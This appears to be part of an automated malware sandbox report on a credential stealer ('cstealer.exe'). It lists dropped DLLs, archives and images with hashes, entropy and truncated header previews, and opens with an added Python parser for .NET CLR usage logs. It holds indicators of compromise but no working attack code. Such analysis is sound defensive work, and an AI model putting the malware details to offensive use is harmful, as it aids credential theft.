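The two "CSV text" drops above (one from DevxExecutor.exe, one from C:\ProgramData\main.exe) have the layout of the CLR usage logs that .NET Framework processes write under %LOCALAPPDATA%\Microsoft\CLR_v4.0\UsageLogs\, which is why both processes produce one: each records the assemblies the process actually loaded, with records tagged 3 carrying the path of the NGen native image that was mapped and records tagged 2 carrying none. The parser below is an added example, not part of the report; its sample input is constructed by merging lines from the two previews (the previews' ".." stand for CRLF), and the final record of the main.exe preview, which is cut off on the page, is left out rather than guessed.

```python
"""Parse the CLR_v4.0 UsageLogs layout seen in the two 'CSV text' drops.
Added example for this report, not Joe Sandbox code."""
import csv

# Constructed from the two previews above (lines merged, truncated last record omitted).
SAMPLE_LOG = (
    '1,"fusion","GAC",0\r\n'
    '1,"WinRT","NotApp",1\r\n'
    '3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\b187b7f31cee3e87b56c8edca55324e0\\System.ni.dll",0\r\n'
    '3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\31326613607f69254f3284ec964796c8\\System.Core.ni.dll",0\r\n'
    '2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0\r\n'
    '3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.V9921e851#\\04de61553901f06e2f763b6f03a6f65a\\Microsoft.VisualBasic.ni.dll",0\r\n'
)


def _split_display_name(display_name: str) -> dict:
    """'Name, Version=..., Culture=..., PublicKeyToken=...' -> its parts."""
    head, *attrs = [p.strip() for p in display_name.split(",")]
    parts = dict(a.split("=", 1) for a in attrs if "=" in a)
    return {"name": head, "version": parts.get("Version"),
            "culture": parts.get("Culture"), "public_key_token": parts.get("PublicKeyToken")}


def parse_usage_log(text: str):
    """Return (settings, assemblies). Record types as observed in the data:
    1 = loader setting (key, value, flag); 2 = assembly loaded, no native image path;
    3 = assembly loaded from the NGen native image whose path is the third field."""
    settings, assemblies = {}, []
    for row in csv.reader(text.splitlines()):   # splitlines() handles the CRLF terminators
        if not row:
            continue
        kind = int(row[0])
        if kind == 1:
            settings[row[1]] = (row[2], int(row[3]))
        elif kind in (2, 3):
            entry = _split_display_name(row[1])
            entry["native_image"] = row[2] if kind == 3 else None
            entry["flag"] = int(row[-1])
            assemblies.append(entry)
    return settings, assemblies


def loaded_assembly_names(text: str) -> list:
    """Just the simple names, in load order: what an analyst scans first."""
    return [a["name"] for a in parse_usage_log(text)[1]]


if __name__ == "__main__":
    settings, assemblies = parse_usage_log(SAMPLE_LOG)
    print(settings)
    for a in assemblies:
        print(f'{a["name"]:<22} {a["version"]:<10} native_image={a["native_image"]}')
```

On a live host the same parser can be pointed at every *.log under the UsageLogs directory to list which .NET executables ran under a user account and what they pulled in; here it shows the Microsoft.VisualBasic dependency of DevxExecutor.exe and the Microsoft.CSharp/System.Configuration/System.Xml set loaded by main.exe.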
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):64
                                                                                                                                                          Entropy (8bit):1.1940658735648508
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Nlllul3nqth:NllUa
                                                                                                                                                          MD5:851531B4FD612B0BC7891B3F401A478F
                                                                                                                                                          SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                                                                                                          SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                                                                                                          SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:@...e.................................&..............@..........
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):668200
                                                                                                                                                          Entropy (8bit):7.923775794069841
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:NDKZM3lTvUyWFppcFKsLCAazDu19Omt7A4Gg5lILO57f62j9BkyxB+H:N/1ZWFpprsza09Ou5GcoOF62ciBa
                                                                                                                                                          MD5:0452DA812BC1BEB6CAA747AB5F0A7384
                                                                                                                                                          SHA1:41ED1E923D1D62866799264FA578812BAA4AC8A8
                                                                                                                                                          SHA-256:9F717A08824B85FEA512C8EC71BBA8E12A18E4508FAD27573A194B55576793E0
                                                                                                                                                          SHA-512:04CEE11EFEED518196DFF2C67A1A007C3F2E1937B8E051DC15FC87484345AFE26656A95DE647295C5F3997ECC6EADE9085D5430880AACB81280F03F2C7BE0A57
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.....G...fVm..uf.L.3..3M......gz.{..h.zh@.{/$...{o......"...........B.!.....q.....2..*k.-Q{.gE..}..U[.H....;.c.I...<9..;&....g...H.G/....wXb.t.6w:_....'.Q|.2U...k.,...g.~.....c..M..;../,....].S...~....g.^.t.|hNL}Z<2.....!L.>...zh$S...~..v.I....sb.......L-....[.S..wq..=....w..TE..w-....l...]i..w...;.2.^....{..`...L...y....[.~>'..>?.o.i(..So.Y......7...}..Z..8.eo..+.So.q(...z.......z..}.[....u...k..z];.Z.z.z.Ogx.-..t..w.._.:..:-..O......+.)L...2..j8.T..by...9.{.U...AW..|~.O..L...=......g5.V../......W..U..6.80.q..i.......;xn..W....H._.k...../....}.K...^..9../..-...3....*...rb..q.uy...c=.........XC....-.;...zz..cm...%ml.~W....s..k.W..........2N......v.(uw...5..;.V.;.^P...l......H.......?.../...-.-..K>s.....\.....9..|j....;_....3.0..E.....N......pA....2_.s...b...k.c..w....t.{.W...s;..y.z...n....v.s...q.@n...w.c^...Y.......9%.Z}..EN.
                                                                                                                                                          Process:C:\ProgramData\main.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1829040
                                                                                                                                                          Entropy (8bit):6.564424655402829
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:c9EeNSPwEW3cFSI4Tfm3hvbHsjAJcAMkP3:c9Nzm31PMo3
                                                                                                                                                          MD5:65CCD6ECB99899083D43F7C24EB8F869
                                                                                                                                                          SHA1:27037A9470CC5ED177C0B6688495F3A51996A023
                                                                                                                                                          SHA-256:ABA67C7E6C01856838B8BC6B0BA95E864E1FDCB3750AA7CDC1BC73511CEA6FE4
                                                                                                                                                          SHA-512:533900861FE36CF78B614D6A7CE741FF1172B41CBD5644B4A9542E6CA42702E6FBFB12F0FBAAE8F5992320870A15E90B4F7BF180705FC9839DB433413860BE6D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nN\.. ... ... .Q..... .Q...e. .Q..... ..Q#... ..Q%... ..Q$... .8..... ..].... ...!.~. .rQ(... .rQ ... .wQ.... .rQ"... .Rich.. .........................PE..d.....d.........." ................................................................6U....`.................................................P...x................!.......T...........@..p............................A...............................................text...0........................... ..`.rdata...1.......2..................@..@.data....`... ...J..................@....pdata...!......."...P..............@..@.gfids...............r..............@..@.rsrc................t..............@..@.reloc...............~..............@..B................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98736
                                                                                                                                                          Entropy (8bit):6.474996871326343
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
                                                                                                                                                          MD5:F12681A472B9DD04A812E16096514974
                                                                                                                                                          SHA1:6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
                                                                                                                                                          SHA-256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
                                                                                                                                                          SHA-512:7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):83328
                                                                                                                                                          Entropy (8bit):6.532254531979707
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:douLz7p5Tcayt0KpkKWVa5cNRT8+smUxJIDtVH7SyD8Px:2uLz9meVamQ+sLxJIDtVHVsx
                                                                                                                                                          MD5:4101128E19134A4733028CFAAFC2F3BB
                                                                                                                                                          SHA1:66C18B0406201C3CFBBA6E239AB9EE3DBB3BE07D
                                                                                                                                                          SHA-256:5843872D5E2B08F138A71FE9BA94813AFEE59C8B48166D4A8EB0F606107A7E80
                                                                                                                                                          SHA-512:4F2FC415026D7FD71C5018BC2FFDF37A5B835A417B9E5017261849E36D65375715BAE148CE8F9649F9D807A63AC09D0FB270E4ABAE83DFA371D129953A5422CA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U...U...U...\.E._......W....+.V......X......]......Q......V......W...U..........]......T....).T......T...RichU...........PE..d...t.Vc.........." ...!.....^......,........................................P......nP....`.........................................p...H............0....... .. ........)...@..........T...........................p...@............................................text...O........................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):123768
                                                                                                                                                          Entropy (8bit):6.017133084000375
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:QC7Pgg3AwEWwSQJKoPfLSHcn0YJwyncXf9IDQPj6Exv:Qz5IX8jPfLSMJwykfoy
                                                                                                                                                          MD5:6A9CA97C039D9BBB7ABF40B53C851198
                                                                                                                                                          SHA1:01BCBD134A76CCD4F3BADB5F4056ABEDCFF60734
                                                                                                                                                          SHA-256:E662D2B35BB48C5F3432BDE79C0D20313238AF800968BA0FAA6EA7E7E5EF4535
                                                                                                                                                          SHA-512:DEDF7F98AFC0A94A248F12E4C4CA01B412DA45B926DA3F9C4CBC1D2CBB98C8899F43F5884B1BF1F0B941EDAEEF65612EA17438E67745962FF13761300910960D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[y..[y..[y..#.[y.. x..[y.. |..[y.. }..[y.. z..[y.. x..[y.O)}..[y.O)x..[y.).x..[y..[x.h[y.. t..[y.. y..[y.. ...[y.. {..[y.Rich.[y.................PE..d...n.Vc.........." ...!.............]...............................................[....`..........................................Q......TR..........................x)..............T...........................`...@............................................text............................... ..`.rdata...m.......n..................@..@.data...$=...p...8...b..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):251768
                                                                                                                                                          Entropy (8bit):6.543870948107038
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:3JhhPXoWcz5HvcQpq9Sr9pmHboiYE9qWM53pLW1AmXYWtmVS9G:fNXoWcznq9Sr9pyKFh6eS9G
                                                                                                                                                          MD5:D47E6ACF09EAD5774D5B471AB3AB96FF
                                                                                                                                                          SHA1:64CE9B5D5F07395935DF95D4A0F06760319224A2
                                                                                                                                                          SHA-256:D0DF57988A74ACD50B2D261E8B5F2C25DA7B940EC2AAFBEE444C277552421E6E
                                                                                                                                                          SHA-512:52E132CE94F21FA253FED4CF1F67E8D4423D8C30224F961296EE9F64E2C9F4F7064D4C8405CD3BB67D3CF880FE4C21AB202FA8CF677E3B4DAD1BE6929DBDA4E2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\F1S.'_..'_..'_.._...'_..\^..'_..\Z..'_..\[..'_..\\..'_..\^..'_..U^..'_..'^..'_..\\..'_..\R..'_..\_..'_..\...'_..\]..'_.Rich.'_.................PE..d...k.Vc.........." ...!.v...<......|...............................................o.....`..........................................T..P....T..................H'......x)......P.......T...........................P...@............................................text...)u.......v.................. ..`.rdata...............z..............@..@.data....*...p...$...R..............@....pdata..H'.......(...v..............@..@.rsrc...............................@..@.reloc..P...........................@..B................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):63872
                                                                                                                                                          Entropy (8bit):6.166853300594844
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:18njpHxGkYjEEEJkn8cw6ThID5IJt7SyiPx:GnjpHxRJ8w6ThID5IJtEx
                                                                                                                                                          MD5:DE4D104EA13B70C093B07219D2EFF6CB
                                                                                                                                                          SHA1:83DAF591C049F977879E5114C5FEA9BBBFA0AD7B
                                                                                                                                                          SHA-256:39BC615842A176DB72D4E0558F3CDCAE23AB0623AD132F815D21DCFBFD4B110E
                                                                                                                                                          SHA-512:567F703C2E45F13C6107D767597DBA762DC5CAA86024C87E7B28DF2D6C77CD06D3F1F97EED45E6EF127D5346679FEA89AC4DC2C453CE366B6233C0FA68D82692
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A.g...g...g.......g..V....g..V....g..V....g..V....g..X....g.......g.......g...g..Qg..X....g..X....g..X.l..g..X....g..Rich.g..........................PE..d...u.Vc.........." ...!.T...~......@?....................................................`.............................................P.......................,........)......\...0}..T............................{..@............p..(............................text...YR.......T.................. ..`.rdata...N...p...P...X..............@..@.data...8...........................@....pdata..,...........................@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):158080
                                                                                                                                                          Entropy (8bit):6.835761878596918
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:5mGf4k8d79MwyHiRr7tznf49mNoaGjQJplJIDe10Yhx:5Pf4FhMwyMAYOao6P
                                                                                                                                                          MD5:337B0E65A856568778E25660F77BC80A
                                                                                                                                                          SHA1:4D9E921FEAEE5FA70181EBA99054FFA7B6C9BB3F
                                                                                                                                                          SHA-256:613DE58E4A9A80EFF8F8BC45C350A6EAEBF89F85FFD2D7E3B0B266BF0888A60A
                                                                                                                                                          SHA-512:19E6DA02D9D25CCEF06C843B9F429E6B598667270631FEBE99A0D12FC12D5DA4FB242973A8351D3BF169F60D2E17FE821AD692038C793CE69DFB66A42211398E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........X...6D..6D..6D..D..6D@.7E..6D@.3E..6D@.2E..6D@.5E..6DN.7E..6D..7E..6D..7D..6DN.;E..6DN.6E..6DN..D..6DN.4E..6DRich..6D........PE..d...~.Vc.........." ...!.d...........8..............................................O.....`..........................................%..L...\%..x....p.......P.......@...)......8.......T...........................p...@............................................text...~c.......d.................. ..`.rdata..............h..............@..@.data........@......................@....pdata.......P....... ..............@..@.rsrc........p.......4..............@..@.reloc..8............>..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):31104
                                                                                                                                                          Entropy (8bit):6.35436407327013
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:cQuCvO+MZFryl9SDCg6rXv5mkWsnTBq9ID7UJIYiSy1pCQYIPxh8E9VF0Nyb9:cl+yFp6rXRmk5s9ID7UeYiSyv7PxWER
                                                                                                                                                          MD5:FF8300999335C939FCCE94F2E7F039C0
                                                                                                                                                          SHA1:4FF3A7A9D9CA005B5659B55D8CD064D2EB708B1A
                                                                                                                                                          SHA-256:2F71046891BA279B00B70EB031FE90B379DBE84559CF49CE5D1297EA6BF47A78
                                                                                                                                                          SHA-512:F29B1FD6F52130D69C8BD21A72A71841BF67D54B216FEBCD4E526E81B499B9B48831BB7CDFF0BFF6878AAB542CA05D6326B8A293F2FB4DD95058461C0FD14017
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........MX..#...#...#.......#..."...#...&...#...'...#... ...#..."...#.Q."...#..."...#.......#...#...#.......#...!...#.Rich..#.........................PE..d...d.Vc.........." ...!.....8.......................................................K....`..........................................C..L....C..d....p.......`.......P...)..........p4..T...........................03..@............0..0............................text............................... ..`.rdata..R....0......................@..@.data...x....P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):78200
Entropy (8bit):6.239347454910878
Encrypted:false
SSDEEP:1536:HJlcAdpEVuju9/s+S+pJGQRivVia3i9IDQw17Sy+Px3sxi:H7ce+uju9/sT+pJGdvVp3i9IDQw1kxZ
MD5:8140BDC5803A4893509F0E39B67158CE
SHA1:653CC1C82BA6240B0186623724AEC3287E9BC232
SHA-256:39715EF8D043354F0AB15F62878530A38518FB6192BC48DA6A098498E8D35769
SHA-512:D0878FEE92E555B15E9F01CE39CFDC3D6122B41CE00EC3A4A7F0F661619F83EC520DCA41E35A1E15650FB34AD238974FE8019577C42CA460DDE76E3891B0E826
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):118656
Entropy (8bit):6.2256831065058815
Encrypted:false
SSDEEP:3072:fArVnbGK9SGnh8u6rqMD6ciFCrl14zZvV9NdJRvdO5yt6sqM7VjEP/OsYpxtXr9T:YrVSK9SGnh8u6ESx5CVQP/yXZ
MD5:D4324D1E8DB7FCF220C5C541FECCE7E3
SHA1:1CAF5B23AE47F36D797BC6BDD5B75B2488903813
SHA-256:DDBED9D48B17C54FD3005F5A868DD63CB8F3EFE2C22C1821CEBB2FE72836E446
SHA-512:71D56D59E019CF42CEA88203D9C6E50F870CD5C4D5C46991ACBFF3AB9FF13F78D5DBF5D1C2112498FC7E279D41EE27DB279B74B4C08A60BB4098F9E8C296B5D8
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):159616
Entropy (8bit):5.9948013841482926
Encrypted:false
SSDEEP:3072:qFrIQQey4VWR98w/PQQcXo8uOVrGxn+SQOXLkd1ItS+Q8YuAfxJIDt75EHx:eEeRV29//4QcJuOynyvxX
MD5:069BCCC9F31F57616E88C92650589BDD
SHA1:050FC5CCD92AF4FBB3047BE40202D062F9958E57
SHA-256:CB42E8598E3FA53EEEBF63F2AF1730B9EC64614BDA276AB2CD1F1C196B3D7E32
SHA-512:0E5513FBE42987C658DBA13DA737C547FF0B8006AECF538C2F5CF731C54DE83E26889BE62E5C8A10D2C91D5ADA4D64015B640DAB13130039A5A8A5AB33A723DC
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):1439447
Entropy (8bit):5.58639468240011
Encrypted:false
SSDEEP:24576:6QRqL5TPAxNWlUKdcubgAnj90H0AWfh7dYMbP/Medfw:6QRqL2xNbeA
MD5:83D235E1F5B0EE5B0282B5AB7244F6C4
SHA1:629A1CE71314D7ABBCE96674A1DDF9F38C4A5E9C
SHA-256:DB389A9E14BFAC6EE5CCE17D41F9637D3FF8B702CC74102DB8643E78659670A0
SHA-512:77364AFF24CFC75EE32E50973B7D589B4A896D634305D965ECBC31A9E0097E270499DBEC93126092EB11F3F1AD97692DB6CA5927D3D02F3D053336D6267D7E5F
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:ASCII text
Category:dropped
Size (bytes):292541
Entropy (8bit):6.048162209044241
Encrypted:false
SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5NF:QWb/TRJLWURrI55MWavdF0D
MD5:D3E74C9D33719C8AB162BAA4AE743B27
SHA1:EE32F2CCD4BC56CA68441A02BF33E32DC6205C2B
SHA-256:7A347CA8FEF6E29F82B6E4785355A6635C17FA755E0940F65F15AA8FC7BD7F92
SHA-512:E0FB35D6901A6DEBBF48A0655E2AA1040700EB5166E732AE2617E89EF5E6869E8DDD5C7875FA83F31D447D4ABC3DB14BFFD29600C9AF725D9B03F03363469B4C
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):10752
Entropy (8bit):4.673454313041419
Encrypted:false
SSDEEP:96:KG+p72HzA5iJGhU2Y0hQMsQJCUCLsZEA4elh3XQMtCFliHUWQcX6g8cim1qeSju1:A2HzzU2bRYoeLHkcqgvimoe
MD5:723EC2E1404AE1047C3EF860B9840C29
SHA1:8FC869B92863FB6D2758019DD01EDBEF2A9A100A
SHA-256:790A11AA270523C2EFA6021CE4F994C3C5A67E8EAAAF02074D5308420B68BD94
SHA-512:2E323AE5B816ADDE7AAA14398F1FDB3EFE15A19DF3735A604A7DB6CADC22B753046EAB242E0F1FBCD3310A8FBB59FF49865827D242BAF21F44FD994C3AC9A878
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):119296
Entropy (8bit):5.872097486056729
Encrypted:false
SSDEEP:1536:OzgMw0g+m/+rxC9Jtd960WsCyqPD1/bZMlDML48Be9zGTVmZRJIRbvB:OsTH+VC9Jtd9VdCr7fMp/8yGTVmzmZ
MD5:9EA8098D31ADB0F9D928759BDCA39819
SHA1:E309C85C1C8E6CE049EEA1F39BEE654B9F98D7C5
SHA-256:3D9893AA79EFD13D81FCD614E9EF5FB6AAD90569BEEDED5112DE5ED5AC3CF753
SHA-512:86AF770F61C94DFBF074BCC4B11932BBA2511CAA83C223780112BDA4FFB7986270DC2649D4D3EA78614DBCE6F7468C8983A34966FC3F2DE53055AC6B5059A707
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):3441504
Entropy (8bit):6.097985120800337
Encrypted:false
SSDEEP:49152:8TKuk2CQIU6iV9OjPWgBqIVRIaEv5LY/RnQ2ETEvrPnkbsYNPsNwsML1CPwDv3u6:Vv+KRi5KsEKsY+NwsG1CPwDv3uFfJu
MD5:6F4B8EB45A965372156086201207C81F
SHA1:8278F9539463F0A45009287F0516098CB7A15406
SHA-256:976CE72EFD0A8AEEB6E21AD441AA9138434314EA07F777432205947CDB149541
SHA-512:2C5C54842ABA9C82FB9E7594AE9E264AC3CBDC2CC1CD22263E9D77479B93636799D0F28235AC79937070E40B04A097C3EA3B7E0CD4376A95ED8CA90245B7891F
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):35064
Entropy (8bit):6.362215445656998
Encrypted:false
SSDEEP:384:SB8J4ihYfwYiXGPc9orPji8i4DDQWvGaRQsTeCXS/Fzc7jsFruRXYV1ZE9DRCXjQ:rGHs4vpegQsTT0uj82S7Fp2DG4yshH
MD5:32D36D2B0719DB2B739AF803C5E1C2F5
SHA1:023C4F1159A2A05420F68DAF939B9AC2B04AB082
SHA-256:128A583E821E52B595EB4B3DDA17697D3CA456EE72945F7ECCE48EDEDAD0E93C
SHA-512:A0A68CFC2F96CB1AFD29DB185C940E9838B6D097D2591B0A2E66830DD500E8B9538D170125A00EE8C22B8251181B73518B73DE94BEEEDD421D3E888564A111C1
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 702816
Entropy (8bit): 5.547832370836076
Encrypted: false
SSDEEP: 12288:UUnBMlBGdU/t0voUYHgqRJd7a7+JLvrfX7bOI8Fp0D6WuHU2lvzR:UN/t0vMnffOI8Fp0D6TU2lvzR
MD5: 8769ADAFCA3A6FC6EF26F01FD31AFA84
SHA1: 38BAEF74BDD2E941CCD321F91BFD49DACC6A3CB6
SHA-256: 2AEBB73530D21A2273692A5A3D57235B770DAF1C35F60C74E01754A5DAC05071
SHA-512: FAC22F1A2FFBFB4789BDEED476C8DAF42547D40EFE3E11B41FADBC4445BB7CA77675A31B5337DF55FDEB4D2739E0FB2CBCAC2FEABFD4CD48201F8AE50A9BD90B
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 5758328
Entropy (8bit): 6.089726305084683
Encrypted: false
SSDEEP: 98304:JdHwQkq3AAtsPv3XXTVEspHBMp4SsPxQpe2bx:JdHwQkq3AMsPvHXSpAxQpe2V
MD5: 9A24C8C35E4AC4B1597124C1DCBEBE0F
SHA1: F59782A4923A30118B97E01A7F8DB69B92D8382A
SHA-256: A0CF640E756875C25C12B4A38BA5F2772E8E512036E2AC59EB8567BF05FFBFB7
SHA-512: 9D9336BF1F0D3BC9CE4A636A5F4E52C5F9487F51F00614FC4A34854A315CE7EA8BE328153812DBD67C45C75001818FA63317EBA15A6C9A024FA9F2CAB163165B
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 29056
Entropy (8bit): 6.49468173344972
Encrypted: false
SSDEEP: 384:5oR1ecReJKwHqUuI7A70RUZ9ID7GvIYiSy1pCQlIJNPxh8E9VF0NyUT2:ezeUeJlHqybG9ID7GQYiSyvCPxWEC
MD5: 97EE623F1217A7B4B7DE5769B7B665D6
SHA1: 95B918F3F4C057FB9C878C8CC5E502C0BD9E54C0
SHA-256: 0046EB32F873CDE62CF29AF02687B1DD43154E9FD10E0AA3D8353D3DEBB38790
